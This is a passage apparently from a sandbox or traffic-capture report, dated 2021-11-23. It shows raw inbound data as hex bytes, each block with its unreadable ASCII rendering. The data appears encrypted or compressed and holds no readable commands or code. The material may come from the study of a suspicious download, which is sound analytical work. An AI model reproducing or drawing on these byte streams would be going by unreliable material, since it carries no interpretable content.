5d 1b 21 4c 3f 48 c7 e9 9e 3c d5 95 c8 9c b1 cb be c7 e5 e8 a9 02 da 73 7c 45 df 2f f8 b6 0e 94 29 2f d3 b3 61 8b 1c db 96 54 c0 de a6 b7 8f 06 97 9f fa 4d 92 2e c1 e1 45 2d 68 e8 81 70 7e ce a2 95 3d 10 13 84 71 85
                                                                                    Data Ascii: gVXF|LnH.wElP%EUJC?x`{; w.|3b6XMoD@nVkrnqLE}V-:?`( EnjQbD-S<Oa7 @Qo|]!L?H<s|E/)/aTM.E-hp~=q
                                                                                    2021-11-23 13:42:43 UTC292INData Raw: 61 80 38 ec 36 84 aa 0e 16 3a df 2c 73 82 95 af 27 7d 04 26 d4 82 8a 57 7c 83 33 d7 43 2d 92 b9 24 ba fa f7 5f 7f ed e0 1b 99 42 2a 3a 2b 60 f2 99 1b fe db 90 2c 7a 1b 13 33 d2 3f 7f 9c 91 99 51 d8 ce a4 71 3c 1d 20 2e de be 98 8e 36 3c aa a1 3d a4 c7 09 2f d5 7a b2 01 ab 6e 3c 35 8b 04 56 b1 e4 c4 bc 66 45 b8 23 f8 19 01 a5 c9 62 18 24 63 fc 49 7a 6f 02 bb 18 16 7b 97 1e 23 f0 35 14 96 4c 3e 4a f7 5d 84 15 72 ad f2 b2 51 8e 44 c9 0f 1f 7b 62 f7 56 57 17 cd 17 0c 89 90 28 50 9a 6b 5d a8 64 57 65 9a d4 f0 f0 f9 72 34 66 4c 60 c0 c9 6d 94 f8 67 16 76 cb ba c8 81 12 d3 a1 13 9c 9c 42 a6 d9 f6 3a 95 6e eb e0 83 d8 42 39 fb bc 86 3a 86 73 8c 36 80 e1 00 4d 49 dd 42 27 0b b1 ca 62 27 d2 50 82 33 8b 90 5a d1 88 0c d3 37 87 08 17 f0 8e 72 26 7b 9f c8 33 90 30 9c
                                                                                    Data Ascii: a86:,s'}&W|3C-$_B*:+`,z3?Qq< .6<=/zn<5VfE#b$cIzo{#5L>J]rQD{bVW(Pk]dWer4fL`mgvB:nB9:s6MIB'b'P3Z7r&{30
                                                                                    2021-11-23 13:42:43 UTC293INData Raw: 95 02 c9 f0 e2 75 ce 1e c4 95 33 1f 46 db 8b 15 66 fb a3 95 24 27 09 8f 41 d6 ac c0 63 fa 5a b1 4c 5b 3d 11 aa 13 67 6c 4b e6 2a 88 ae fa e9 a9 07 bf f7 a6 07 18 9f 18 a7 dc 01 18 7d 89 ec e3 c4 0a ae fd 25 77 81 88 49 4f 61 f6 d9 16 9d 68 54 7c b1 b4 fe da 8b 2f 85 df 31 1f cb 17 ef e9 07 9d ea 72 95 c8 ae 2a 17 67 43 39 97 77 fc d3 14 7d be 8c 34 0c 36 61 d0 10 3e 17 87 7b 0c 38 6a be e7 3e a2 a7 80 e1 a5 82 ff 52 f5 4d a3 f4 3c 7c fe 7e ca 3f 62 25 bf ee 46 d7 4f 22 c0 52 90 ee 34 21 12 0a 08 11 d9 c1 8a f2 65 e1 65 82 ab e6 2f ad f5 e7 21 a1 30 89 b0 09 fa e8 5e cc 7a f0 ad b7 0f 4b 56 39 e0 9d 5c 68 b8 81 c2 3e c5 2b 98 56 cc bf 39 b2 34 a7 ee d7 41 2a 99 75 7f 65 8f de bd 18 83 49 a8 26 c7 cf e4 75 11 43 47 ca 6f 80 63 41 a4 a4 8e ad 15 30 be cf 39
                                                                                    Data Ascii: u3Ff$'AcZL[=glK*}%wIOahT|/1r*gC9w}46a>{8j>RM<|~?b%FO"R4!ee/!0^zKV9\h>+V94A*ueI&uCGocA09
                                                                                    2021-11-23 13:42:43 UTC294INData Raw: 89 77 85 28 a9 ee 6e c1 b9 18 9e 7d c5 5e 1e d3 a7 4e 26 60 8b 89 57 9f 59 9b 4f 53 1b 5c c6 89 47 88 47 ea 09 d0 3c 52 06 62 8d 1e f5 9c 90 f4 ea c9 4c 74 96 1f d3 d8 0f f7 6b 24 93 a5 85 8c f0 89 00 79 f9 a4 dd a3 91 3e 01 08 c8 57 ba 58 92 e7 01 3a a6 bc c1 a6 24 59 4a 5e 08 15 08 24 c3 e6 60 df 6d 5f 31 91 e1 b2 3b 5c 7b 92 87 45 6c 76 d4 d3 88 4a 30 e8 3e 41 77 7e 6e f0 c9 31 70 7e 36 1a 58 79 76 c9 e9 e6 bc 36 6b 5e 10 11 66 85 e5 e1 da 42 a9 c6 5c 83 b4 71 99 c9 24 e8 d7 14 04 85 3a f3 6e 13 6f a2 92 c7 83 32 1f 7c 04 f5 1b 60 73 6b ac fa 9a 94 fc d5 86 6b 28 02 40 a8 5e cd ba fe 98 e4 f3 d4 02 5c 1f a1 a2 5e 0d 4f f2 f6 11 58 52 70 4d 9f 45 9c f8 27 ec 56 9d 1f 78 73 73 6c 84 3b 19 1b 80 76 11 48 7d 7b 2a 53 cc d1 9f 5e 8b be ef 85 b6 89 bd 86 da
                                                                                    Data Ascii: w(n}^N&`WYOS\GG<RbLtk$y>WX:$YJ^$`m_1;\{ElvJ0>Aw~n1p~6Xyv6k^fB\q$:no2|`skk(@^\^OXRpME'Vxssl;vH}{*S^
                                                                                    2021-11-23 13:42:43 UTC296INData Raw: 02 fd 5d ba 28 d1 e4 e1 7e 27 23 10 89 34 b9 68 4e 96 c0 8a 95 31 20 ac e6 1f 3b 9c 20 84 bb eb 01 c9 7a 49 57 36 63 d5 a2 c0 2a c6 9f 03 11 e7 be ce 80 f7 13 5f aa 1b ff 6f 9d e7 77 7f 6a 81 32 4c 98 87 af 0c 14 61 36 cc d0 ed 70 5c c2 20 ee 54 0f de e2 6b 86 d6 87 0a 44 d2 f1 38 99 4d 55 47 1c 58 d7 b0 5d fa e0 be 3c 77 67 2e 2d ef 6d 10 a5 b2 ae 58 dd 82 ea 0c 2a 2b 21 5a e6 a5 c2 9b 4e 3d ef 81 4f f9 de 7e 2b 91 31 c8 2f 81 40 34 24 a8 14 71 fd b2 ee b9 6c 7b a1 50 b1 6e 37 ee d2 7e 23 49 35 90 3d 48 3d 08 e7 05 12 4f cf 02 3e e4 4c 62 ea 00 45 13 c5 07 98 14 64 8b db ae 5a bd 52 cf 03 0c 2c 49 d4 0d 7e 14 95 58 4a b4 87 27 25 b0 68 54 8d 6a 4a 75 8d cc e3 fd 9c 34 7e 37 58 76 cd f6 74 84 d7 53 75 75 df 9d e2 a1 49 a1 97 19 bf a5 6b 98 e0 ba 6a ae 7c
                                                                                    Data Ascii: ](~'#4hN1 ; zIW6c*_owj2La6p\ TkD8MUGX]<wg.-mX*+!ZN=O~+1/@4$ql{Pn7~#I5=H=O>LbEdZR,I~XJ'%hTjJu4~7XvtSuuIkj|
                                                                                    2021-11-23 13:42:43 UTC297INData Raw: 66 d3 50 1c 2b ec 19 23 39 72 3d 26 4a db ec 90 5c ca 88 fa c1 f3 a7 9b a9 a5 e3 d1 02 da 73 7c 45 ce 32 c2 ad 28 e4 35 3f 8f ac 62 a2 60 8b d9 7a f3 d0 bc a4 aa 65 9b 9b 95 06 99 16 f2 e5 69 31 54 c9 aa 65 73 ec e3 87 3d 0a 1d df 20 ce b7 ca 45 d9 14 bc 29 1e 52 33 aa 41 0a 35 31 d3 3e b7 c0 91 98 82 27 b4 fb 96 24 06 d9 1f b5 fb 0b 13 34 cb ba d3 97 56 fa 84 69 6d 8c d9 37 30 64 be d4 17 9c 6f 53 26 a3 ed d2 c1 e2 2b c0 ab 3a 57 ee 42 ba c8 2e e7 d3 42 e4 e2 d3 39 32 59 7f 1a a3 2e ff d7 15 27 83 92 09 5e 7c 58 dc 43 01 1f 85 74 07 3d 7a dc f9 7b 81 af 8a ab bf 88 ee 73 9f 07 9e ea 01 2e f1 3c d8 31 75 2f b8 af 01 fa 73 14 c9 53 e8 ee 3b 2b 0e 1c 1b 36 e3 f5 fd 88 02 8b 30 9f 90 fe 16 8d ea b6 56 9b 27 a5 de 4f f7 85 17 8d 12 fb ac 85 10 7a 28 71 b0 f7
                                                                                    Data Ascii: fP+#9r=&J\s|E2(5?b`zei1Tes= E)R3A51>'$4Vim70doS&+:WB.B92Y.'^|XCt=z{s.<1u/sS;+60V'Oz(q
                                                                                    2021-11-23 13:42:43 UTC298INData Raw: c2 70 02 1f 38 c1 79 09 23 23 d3 ca 97 c1 ec 9d c3 09 2c 33 19 f9 49 f4 96 d9 c2 ec ce 86 36 74 31 a4 dc 17 68 27 8d cb 16 2a 7f 73 7f 83 59 f4 cc 25 a5 5b 9f 5c 6e 10 48 18 84 18 1c 5a 9e 76 60 25 79 65 0a 4d d0 fc b9 5f ec f2 d8 9f af bf 89 c5 e6 ee 8f 70 b0 03 73 72 f5 3a d0 a0 29 81 11 22 8d b1 21 a4 33 d5 c7 2c c2 df e8 f1 c4 09 d7 91 a0 17 cd 1e 81 98 64 0c 44 f5 b5 14 6c f9 9e 86 27 0a 1a df 20 9b d5 ab 2f 93 58 c0 5a 45 27 05 c6 58 43 02 37 de 59 c7 d4 ba da a5 04 9f d9 be 08 6c d7 2a d0 b1 47 1a 6c dd e1 ca 92 7d c3 eb 40 55 81 a0 01 71 49 cf e7 17 e6 69 59 72 d8 d5 90 8b ae 20 af ec 6d 02 e3 0c bb 99 3f bf d3 57 97 cd a8 5a 7d 58 52 2c a7 22 ac a0 0a 25 ca f9 68 11 34 4c 91 59 72 27 87 20 6c 17 78 f4 ce 3a a4 95 a7 ab bc b4 cc 00 ab 09 e7 e1 50
                                                                                    Data Ascii: p8y##,3I6t1h'*sY%[\nHZv`%yeM_psr:)"!3,dDl' /XZE'XC7Yl*Gl}@UqIiYr m?WZ}XR,"%h4LYr' lx:P
                                                                                    2021-11-23 13:42:43 UTC299INData Raw: b5 4b 66 29 9c 07 34 d2 78 70 92 3e 42 72 e5 77 94 3d 6f ad d0 8d 65 ca 3e ed 10 42 20 66 d9 50 66 1d fc 07 3f 8d 8f 1c 29 9d 4d 05 9f 33 61 39 8f 90 80 b6 c4 45 36 3d 1e 56 d7 e9 43 ad d7 60 44 79 95 84 e2 a3 1b ca a7 2d 9f 9a 11 ff d9 f6 3a 95 3c 84 db f9 b0 5e 4a a6 e4 90 11 8c 5d 97 08 a7 fd 22 43 68 df 52 27 0b b1 ca 62 27 d5 35 f2 26 8c b1 6f b6 8b 0a c7 0e a5 0b 3a d0 8e 52 67 26 92 fe 33 90 30 9c 3e 61 55 5c dd 93 6b f3 59 c9 7d fa 37 48 15 73 e4 24 f6 d3 c0 d5 9f fa 13 24 e4 6f da df 68 dc 1e 6c e5 a3 80 b2 ad ad 5f 44 cb f2 89 aa 91 4f 7b 08 ba 6d f7 04 d5 f0 66 28 b3 92 ff f9 1f 60 4b 7f 03 20 06 27 e4 9d 79 d2 46 4d 47 e1 b5 87 5c 52 1e af a5 56 79 2a eb c3 cd 19 34 c5 23 68 68 6f 1b b8 cc 7d 08 2d 3d 08 18 2b 7f f6 e8 c1 97 08 43 10 3c 40 66
                                                                                    Data Ascii: Kf)4xp>Brw=oe>B fPf?)M3a9E6=VC`Dy-:<^J]"ChR'b'5&o:Rg&30>aU\kY}7Hs$$ohl_DO{mf(`K 'yFMG\RVy*4#hho}-=+C<@f
                                                                                    2021-11-23 13:42:43 UTC300INData Raw: 1b d0 0a 10 23 ac 5a 53 01 47 fe fa 31 fe fd a7 fd cf e7 ae 08 b9 33 95 9c 4e 4f 89 00 e9 01 6d 1e af ae 7a 8d 0c 6f c8 11 f5 8f 31 45 47 7d 67 47 f0 bb f9 d0 47 db 40 a2 94 cc 5e ce dd d2 73 bd 54 fc dd 1a 81 b1 6f b6 0a f0 8a ea 72 69 45 26 83 e4 48 7e 8d a9 f0 17 f5 71 d8 1d 95 fe 4d e6 71 ab e1 e8 02 0e d9 6d 7d 6e b1 cf bc 2f c0 48 bf 66 82 d7 c7 27 76 5d 47 bb 7c c7 5e 4d af bf 81 cc 18 38 9d c9 38 3b c7 26 a0 89 82 72 c5 42 66 46 66 4d b5 83 d6 1d f5 84 13 1e ea 9d d3 bf 89 7b 5d 83 05 be 66 f1 da 33 35 24 93 65 44 af 9a 9c 5c 4b 5b 65 fa df 89 3b 39 e8 3e cb 46 28 96 8a 35 81 c7 bc 56 44 fd fa 3f 93 64 45 72 13 52 c6 81 0c 95 ec 8b 1b 30 26 30 2d 9e 7e 7c 9f b3 97 4b c8 cb a9 63 07 04 06 2e f9 a4 e4 bc 31 05 bd a9 35 ab a9 60 2b e0 36 b0 6b d6 6d
                                                                                    Data Ascii: #ZSG13NOmzo1EG}gGG@^sToriE&H~qMqm}n/Hf'v]G|^M88;&rBfFfM{]f35$eD\K[e;9>F(5VD?dErR0&0-~|Kc.15`+6km
                                                                                    2021-11-23 13:42:43 UTC302INData Raw: ef 01 43 79 29 1f 9f a0 24 5a 79 36 10 1c 3a 78 e1 ff c1 bc 3a 3c 6b 20 54 30 dd fe e5 fa 66 fa 91 33 ca d8 55 f6 f9 71 8a e2 1f 0a ba 03 fc 4c 30 0e 8f e9 e1 c2 2f 1f 2e 6d d0 47 65 31 02 f6 b6 97 c1 ec 9d c3 0b 14 0d 74 c8 3a ea a5 c2 ca d2 ff ae 09 08 2a 8f db 34 64 24 f7 a3 42 45 48 00 22 9b 10 83 e1 03 d2 4c 95 5b 4c 2e 40 2f 96 4b 1c 5a 9e 76 60 18 15 79 22 46 c9 fc 9f 2b fd 8c d8 bb 98 dc 87 b1 e0 de dd 6a bd 6d 7c 34 98 5d eb 9a 44 95 33 0f 8a b2 68 9c 17 db 85 43 ff e0 ad c3 a3 61 ec d1 e7 1d ed 08 c4 e4 37 11 69 fd 9c 7d 4e f5 f4 b9 04 24 24 cd 03 d1 d5 ab 2f 93 58 ea 4a 6b 04 08 8c 45 12 08 37 a3 00 d4 f1 8f da a6 51 de f5 e5 3e 6c d7 2a d0 b1 47 4a 07 a1 f3 c6 c8 72 e2 9a 48 4e ff 94 05 4d 73 f2 ae 2c e1 45 49 72 d8 d5 90 8b ae 4e ab ef 77 40
                                                                                    Data Ascii: Cy)$Zy6:x:<k T0f3UqL0/.mGe1t:*4d$BEH"L[L.@/KZv`y"F+jm|4]D3hCa7i}N$$/XJkE7Q>l*GJrHNMs,EIrNw@
                                                                                    2021-11-23 13:42:43 UTC303INData Raw: c6 ad 51 1a 0c 17 72 fd b6 9b de 12 3d dc 8c 67 c6 f9 15 20 c3 54 ba 37 8a 37 29 3a b7 7e 4b ed f9 d3 99 59 1a f3 62 ea 6c 42 bc be 52 4f 74 2b ad 0d 19 3e 32 d8 01 01 4f d4 04 1f f3 7a 0a a2 05 55 06 e0 06 a8 28 47 8d f1 90 67 d1 66 e6 23 1e 46 44 d0 0c 58 38 f8 50 28 a2 8f 71 6d d9 27 0d b4 34 78 56 be d9 b7 cf 88 00 09 72 19 54 e8 dc 34 9d c0 45 4c 74 c0 f2 92 e8 5f ad bf 14 a8 9a 75 97 ef 99 69 9c 55 8b 83 a0 e3 7a 0e c0 e5 b5 33 d1 72 de 5a e5 96 77 54 4f c6 41 54 5f d9 bc 36 03 f5 23 d9 3e b0 bb 63 c2 b9 25 e1 49 93 5b 17 e9 87 5f 1e 2d 99 ee 3d ec 75 f9 62 34 42 71 d8 bf 4e 9f 1e ac 69 84 05 77 27 70 cc 02 d0 cc ff fb 9a d0 6f 4e c0 38 b6 97 08 c8 64 17 87 f6 dc c5 bd c2 1e 48 f5 ec a8 fc 94 34 72 27 9e 6d 81 0f 8a 9d 12 20 8e af f5 8e 3d 09 26 17
                                                                                    Data Ascii: Qr=g T77):~KYblBROt+>2OzU(Ggf#FDX8P(qm'4xVrT4ELt_uiUz3rZwTOAT_6#>c%I[_-=ub4BqNiw'poN8dH4r'm =&
                                                                                    2021-11-23 13:42:43 UTC304INData Raw: d7 bd 5b 56 f1 b6 3e 75 43 e0 df 14 ed 36 18 6c d8 a4 d5 ee bb 58 a4 e5 4c 6e d7 39 b5 d0 38 9f c9 57 80 ac 84 39 10 48 58 38 bc 26 da f0 07 2d 8c dd 5c 45 38 76 dd 2b 3c 02 a0 2c 5d 69 3e a5 ac 2e f4 b5 bd d6 c0 b2 b5 04 83 41 cb 80 33 49 f9 79 ee 45 16 14 ba ab 18 88 38 7b 91 44 c2 f3 02 2b 2b 12 21 16 d8 b4 a7 fd 78 fa 79 b1 aa dd 59 a4 c9 e3 28 ec 62 e9 b5 0a db b8 3b de 04 c7 b9 ac 15 5e 63 2e 84 82 7c 5b 81 d4 c4 69 c7 70 80 3c cc 8f 3d bd 75 90 c0 8d 0a 76 e7 7f 46 50 ed fe fc 2d cc 23 d2 73 8e c7 f9 7e 7e 15 30 ef 1e c8 7d 53 a5 90 e8 a6 3b 6d b9 d6 0a 75 a1 10 86 aa 9b 71 b5 2f 77 70 19 6e 8f b8 e7 5e c6 d1 22 1c b4 d4 ea db c5 02 03 b5 1d eb 0b f0 80 7c 5c 58 b1 11 65 c0 8f 9e 3a 50 62 3b ed fd e3 5a 5d ec 1d ab 74 14 b9 f3 1f 9e ea 99 70 40 e0
                                                                                    Data Ascii: [V>uC6lXLn98W9HX8&-\E8v+<,]i>.A3IyE8{D++!xyY(b;^c.|[ip<=uvFP-#s~~0}S;muq/wpn^"|\Xe:Pb;Z]tp@
                                                                                    2021-11-23 13:42:43 UTC305INData Raw: 24 24 fe 9d bb ef bf 44 04 34 c5 2c b8 5b b8 b4 66 64 c1 f4 bb b0 3c 56 4f 59 1e 33 04 2b 83 a9 68 ec 52 62 02 c2 d2 b8 4b 67 1b 86 cb 0c 29 65 b9 f3 80 20 4a f1 3e 64 44 77 00 a1 b3 2d 5a 60 4b 2c 64 3f 63 bf f6 d6 cc 4f 09 0a 4a 56 45 a7 c7 cb f1 51 db b7 2e f6 bb 47 81 94 3c d8 a4 0b 0e 9a 02 d0 06 5c 59 de e2 d2 dd 3e 2b 3d 39 d1 6a 3f 09 31 a3 c4 98 99 bc e2 de 13 78 3d 08 f7 50 bb d3 be cf f3 cd a6 15 78 79 a8 d6 17 41 21 81 f7 5f 5c 73 75 5a af 66 be dd 15 a9 27 c7 0e 09 37 68 0c 9d 1b 75 12 8e 2a 44 06 2c 59 29 6a f9 e2 b8 59 d0 85 f0 a5 fa c5 d1 d3 a9 f5 8d 09 8b 37 75 67 da 29 fd bc 34 ab 14 2f d3 bb 7c b2 3c f7 e3 7c ad 89 d5 d2 da 45 9f f1 dd 66 c8 21 e5 a6 36 0a 38 e0 9c 78 7d f6 81 91 29 13 0a e8 4c 9b e8 88 31 df 0d d8 7c 74 22 23 ba 68 28
                                                                                    Data Ascii: $$D4,[fd<VOY3+hRbKg)e J>dDw-Z`K,d?cOJVEQ.G<\Y>+=9j?1x=PxyA!_\suZf'7hu*D,Y)jY7ug)4/|<|Ef!68x})L1|t"#h(
                                                                                    2021-11-23 13:42:43 UTC307INData Raw: 9f 87 ab 48 59 7b 17 93 f0 f3 27 37 c2 19 cd 70 40 e3 c1 75 ca de 8b 0b 53 8d eb 18 9f 65 2b 79 1c 79 e4 ba 01 e2 fa 85 1d 35 71 74 2d d2 4e 0e e9 84 8b 4e ed ab e4 54 23 41 03 48 e7 c0 e1 cf 4d 3b ae 80 42 e3 fa 02 2b ac 12 d6 63 93 71 18 22 b6 24 47 ca b3 c4 93 7d 54 b6 4f a8 6c 20 91 f0 45 3f 35 35 ad 7c 0f 64 31 fb 39 2b 5d d8 26 7f d1 3a 04 ee 55 76 3e fa 6b a1 29 45 a0 f0 91 08 b3 07 86 5b 0b 5d 6f 83 49 6e 1f ea 26 06 c2 8f 33 11 81 53 61 81 4f 6c 6f 98 dd f8 f2 ad 60 04 44 7e 56 fe 90 5a c2 d8 67 50 76 f2 a7 cc b2 0f ad ce 5d cc 8c 48 f5 b6 80 4c a8 4c 8c fb f0 e6 58 42 ce e6 e8 0c b7 30 d0 1f a4 88 77 25 06 97 72 7b 4f c2 8e 3e 06 de 72 c3 2e 88 8c 5a e2 ad 77 fc 22 92 3a 2a c5 dc 36 52 37 e1 ce 4d c1 7d d1 4d 53 78 47 d4 8c 4d 81 76 f5 02 d4 10
                                                                                    Data Ascii: HY{'7p@uSe+yy5qt-NNT#AHM;B+cq"$G}TOl E?55|d19+]&:Uv>k)E[]oIn&3SaOlo`D~VZgPv]HLLXB0w%r{O>r.Zw":*6R7M}MSxGMv
                                                                                    2021-11-23 13:42:43 UTC308INData Raw: b2 f2 27 1a 85 b6 b7 0f 35 07 8e 01 cb b9 dd 3a c0 40 e8 5b 76 17 04 ad 63 0d 78 27 aa 52 e3 b9 f5 de 8c 11 d2 cd 96 26 09 b2 12 b5 de 06 62 46 83 ed ca ae 79 9d af 6f 3b 88 ec 4e 3c 74 cc a6 37 9d 40 5b 35 9f b9 df e6 9b 74 8a c1 61 76 de 19 cb ed 30 ee b9 03 f2 a5 92 18 0a 36 01 36 94 3b de f2 0c 03 fc d9 6d 38 2a 6f e8 0b 2e 0e a9 25 03 54 1d bb e0 15 b5 bf bb e1 a6 b7 c6 74 bf 24 87 a2 63 77 93 2c cf 4f 1d 00 89 e1 18 b5 1b 65 dd 44 d3 f1 3d 11 4f 2a 25 5e f6 ba a1 fb 3b ef 4a 82 89 88 24 db c9 b9 28 d1 41 f7 f9 1e 83 b8 07 cb 15 de ba 9d 39 6b 5c 16 ea a2 17 5a ba af d9 69 d8 7a d1 72 8b c3 1f ea 32 b0 88 89 48 71 ea 6d 69 63 88 91 89 18 e8 71 86 1e c2 d9 ec 75 2c 60 59 86 2e c8 77 7e a7 b8 ee e4 03 2f ea b4 29 67 a5 01 96 f1 b3 5b 8c 3c 5f 0c 62 29
                                                                                    Data Ascii: '5:@[vcx'R&bFyo;N<t7@[5tav066;m8*o.%Tt$cw,OeD=O*%^;J$(A9k\Zizr2Hqmicqu,`Y.w~/)g[<_b)
                                                                                    2021-11-23 13:42:43 UTC309INData Raw: 04 1f e6 8c 5a 15 5d 9d 82 33 ad 13 82 72 26 7b 3b f1 8e 30 8a 68 c7 3d ce 46 6c 20 59 d9 0e cc f2 d9 e6 9c a0 13 19 c7 71 96 98 19 c6 65 75 bb bd b7 89 d8 bc 58 7f e5 80 9a d2 d1 72 71 16 b9 5d a7 61 9f e6 2a 1a b4 9c b2 96 03 5c 5f 60 3a 32 3c 38 f7 a0 14 be 02 3a 04 fb f0 86 3e 03 04 bf c6 5f 4f 2e c0 f0 cc 3b 13 ee 31 44 75 70 09 ee c9 40 2b 33 71 4b 7a 75 6a c0 94 dd 80 1c 51 66 35 4f 6b b4 cd da a9 42 a7 ad 1d 9d b4 00 e8 c4 23 ef e6 22 0a a2 74 d4 6f 23 20 94 a8 c7 f7 14 18 17 10 d7 16 1e 14 75 ac 8b 89 fc be e5 dd 13 6f 33 6d c0 29 bf b9 a4 be b3 d2 ab 0a 64 7b a2 a6 54 64 1b a2 b7 50 49 65 0f 7e f9 07 8a ca 30 a7 5d a6 54 63 17 55 34 ee 73 02 67 cc 2a 41 00 05 41 2f 53 eb df eb 4d d8 81 88 cc 95 c8 86 83 fa cc ad 02 e7 50 62 09 ca 16 e0 fd 0e 96
                                                                                    Data Ascii: Z]3r&{;0h=Fl YqeuXrq]a*\_`:2<8:>_O.;1Dup@+3qKzujQf5OkB#"to# uo3m)d{TdPIe~0]TcU4sg*AA/SMPb
                                                                                    2021-11-23 13:42:43 UTC310INData Raw: 7b c9 18 4d b7 b1 d9 ac 34 74 dc a0 67 32 8d 0a ba 81 81 57 ac 4d 5a 5b 0d 5f 95 f9 a2 1e e7 d1 28 30 e2 b8 92 b1 8b 13 50 88 07 f8 37 d3 b1 7c 4e 41 91 04 57 a5 90 84 35 29 32 70 9f c5 e3 28 36 dd 20 f4 7d 0a e8 95 6f 9c e5 8d 7b 46 91 e7 40 fb 23 55 68 08 78 cc 92 05 94 e9 ce 23 6a 40 20 72 82 37 15 a0 8c b7 6c 93 fb ff 01 3f 03 34 53 f8 87 cf dc 2b 3e ef c9 57 a4 c5 20 59 f4 67 9b 1f d3 3b 35 28 b1 3d 4c d2 b2 ef f1 45 0a fd 4f b2 00 04 bd c9 4a 1e 3d 35 90 5f 11 28 30 ef 1e 34 7c fb 31 78 c7 2a 22 a4 1c 75 0b ea 70 d3 28 2f bf d3 f0 62 e4 45 96 5e 4d 45 78 82 5a 71 57 f1 5c 02 ac d1 30 27 8c 39 30 e6 38 48 37 9a de cf f7 91 05 11 7b 79 41 d9 f2 50 a5 ec 5c 4f 4c c5 bb c8 ad 18 e9 96 32 d5 cd 14 f0 b3 87 76 a3 3e ee 96 ad ea 1f 14 f5 b5 df 7d df 74 b4
                                                                                    Data Ascii: {M4tg2WMZ[_(0P7|NAW5)2p(6 }o{F@#Uhx#j@ r7l?4S+>W Yg;5(=LEOJ=5_(04|1x*"up(/bE^MExZqW\0'908H7{yAP\OL2v>}t
                                                                                    2021-11-23 13:42:43 UTC312INData Raw: e6 d2 aa 43 f7 a3 e8 b8 f1 8c 84 9b c3 b6 a7 6e b2 02 28 56 fc 51 de 85 12 f1 0a 25 86 ad 5e 97 60 8f b2 38 ad c5 e7 a9 97 00 cc f1 ac 66 9c 33 d7 e4 30 16 78 e2 bf 71 6f d0 8c bf 39 1a 3b f6 30 d5 83 df 40 d4 40 f8 5f 71 4b 32 af 5c 43 7a 19 aa 6f c0 a7 b9 df bb 0c 8a fd b8 1a 18 b0 1c 9a ce 63 6f 63 ba cb e0 b6 5c ff eb 6b 56 c4 98 37 40 60 f2 fc 71 9c 61 73 00 b3 a2 f2 d2 8a 77 a3 b5 07 05 b0 07 bc 90 1a 8b d5 27 e1 f9 c7 3f 0f 37 74 17 b7 4d e5 c6 79 0e e9 fe 34 40 41 0a ac 0b 3f 37 a7 77 5c 39 68 d2 ff 0a 94 f5 d1 a0 c0 b1 c8 60 9c 21 c7 e2 32 79 a2 79 f6 13 69 3a ad b3 73 87 60 2d f8 60 e9 da 00 4e 2f 40 44 59 bc f3 95 e0 76 8c 57 83 fe f8 29 93 af b3 21 e7 15 87 f8 0c 83 bb 11 88 0c e2 8b b3 26 51 47 1c e2 9f 73 4b 82 b2 b8 6c f8 3e 8d 3d f9 c3 6e
                                                                                    Data Ascii: Cn(VQ%^`8f30xqo9;0@@_qK2\Czococ\kV7@`qasw'?7tMy4@A?7w\9h`!2yyi:s`-`N/@DYvW)!&QGsKl>=n
                                                                                    2021-11-23 13:42:43 UTC313INData Raw: 16 a0 be 4d ae a5 48 95 eb ad 70 96 6c ad c8 fa e6 63 4d cf d1 e2 5e c1 38 92 3e b3 d2 13 4e 4c eb 6e 72 52 e5 84 36 25 e2 44 fb 2a b2 80 40 cd 8e 09 d9 1e a4 07 08 e3 8b 38 01 7a ef d1 42 e4 6f f2 47 5a 18 3e bc e6 39 b7 12 cd 28 e1 3f 4e 00 69 c5 1d f1 c9 cc c6 e4 ef 4f 20 9e 74 d6 ef 67 8f 56 07 eb ba be 90 f1 98 0e 64 f3 f7 c6 df ae 7e 6e 0f c3 79 8c 09 97 ea 2f 6e b0 90 b7 a3 79 65 4e 66 1b 0e 35 09 e5 bf 44 ef 68 4c 0d d8 d9 cc 0d 10 75 a6 b0 6b 65 02 f0 ce e2 2e 2c c9 06 77 28 59 31 b4 a1 1f 62 64 4a 10 18 0f 5b c8 e4 c9 92 20 45 79 3a 52 57 9b c6 e1 d1 51 c6 b7 3f 9d 89 23 f6 88 21 86 f2 33 73 db 07 a7 1f 03 09 94 ee 87 d5 22 1e 3a 0c cf 65 1c 4e 75 91 a8 97 b0 f9 e6 ea 7a 01 05 7c cf 0f df 8c c7 b1 d3 e9 9c 61 64 3e b7 ea 04 30 51 cf a4 1b 62 61
                                                                                    Data Ascii: MHplcM^8>NLnrR6%D*@8zBoGZ>9(?NiO tgVd~ny/nyeNf5DhLuke.,w(Y1bdJ[ Ey:RWQ?#!3s":eNuz|ad>0Qba
                                                                                    2021-11-23 13:42:43 UTC314INData Raw: 77 c2 63 90 0f 59 ac fc f2 61 ec 4b c2 35 0b 67 55 cd 7e 06 16 9d 30 3d db df 45 73 e4 75 05 92 5d 7c 42 a8 f9 ca c5 a8 7d 0c 38 63 4c e5 e0 47 86 f0 3a 66 72 e1 84 ec b8 06 c1 89 0e c2 d9 7d ae a0 81 58 83 55 86 f1 90 b5 2c 59 bf f9 9e 0c db 64 a5 21 b4 e5 0f 4a 53 da 45 60 40 d7 86 34 39 fd 7a c1 41 c7 d9 0f ba aa 11 c9 2d ae 34 37 c3 83 6a 13 30 e9 8e 4d c3 51 8d 59 71 61 73 ed f8 39 c6 00 91 3b ec 23 7f 14 5f df 03 ff d7 d9 f1 ef d6 5d 7a bb 7f 96 e5 00 d1 17 19 eb cb c2 f8 ef c8 18 6b f9 ea b8 ef 94 6e 73 2a 99 4b be 0f a6 ba 38 36 a5 ee e1 fc 77 34 38 2a 2d 6c 5a 04 c7 a5 79 fa 77 65 38 df a4 bc 54 60 3c 8f 82 5f 4b 70 d5 bf 88 4a 5a bb 39 62 57 42 16 89 ae 16 40 5e 38 0e 78 79 53 ed e7 ff 9f 18 59 71 10 1a 3d ee b4 95 ee 72 c3 98 1a 91 ad 53 a0 af
                                                                                    Data Ascii: wcYaK5gU~0=Esu]|B}8cLG:fr}XU,Yd!JSE`@49zA-47j0MQYqas9;#_]zkns*K86w48*-lZywe8T`<_KpJZ9bWB@^8xySYq=rS
